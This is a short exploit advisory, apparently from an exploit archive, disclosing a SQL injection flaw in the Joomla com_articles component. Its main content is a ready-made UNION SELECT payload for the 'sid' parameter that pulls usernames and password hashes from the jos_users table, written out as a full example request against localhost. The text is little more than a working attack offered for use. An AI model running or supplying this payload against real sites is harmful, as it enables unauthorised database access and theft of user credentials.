The Joomla Articles component suffers from a remote SQL injection vulnerability.
f5c7da3fdd1c8caa2a8e26196c1f7c2401aa3a5cf77197ad472aa81d1ea88fb7
****************************************************************************
Joomla Component com_articles SQL Injection Vulnerability
****************************************************************************
# Vulnerability : Joomla Component com_articles SQL Injection Vulnerability
# email : Pratulag@yahoo.com
# Author : Pratul Agrawal
************************************************ ExploiT *******************************************************
[*] Vulnerable File :
http://127.0.0.1/index.php?option=com_articles&task=view_addarticles&sid=[SQL]
[*] ExploiT :
9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—
[*] Example :
http://127.0.0.1/index.php?option=com_articles&task=view_addarticles&sid=9999+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10+from+jos_users—
********************************************************************************************************************
# If you have any questions, comments, or concerns, feel free to contact me.
Quote of the day - "I'm an excellent housekeeper. Every time I get a divorce, I keep the house." hE He he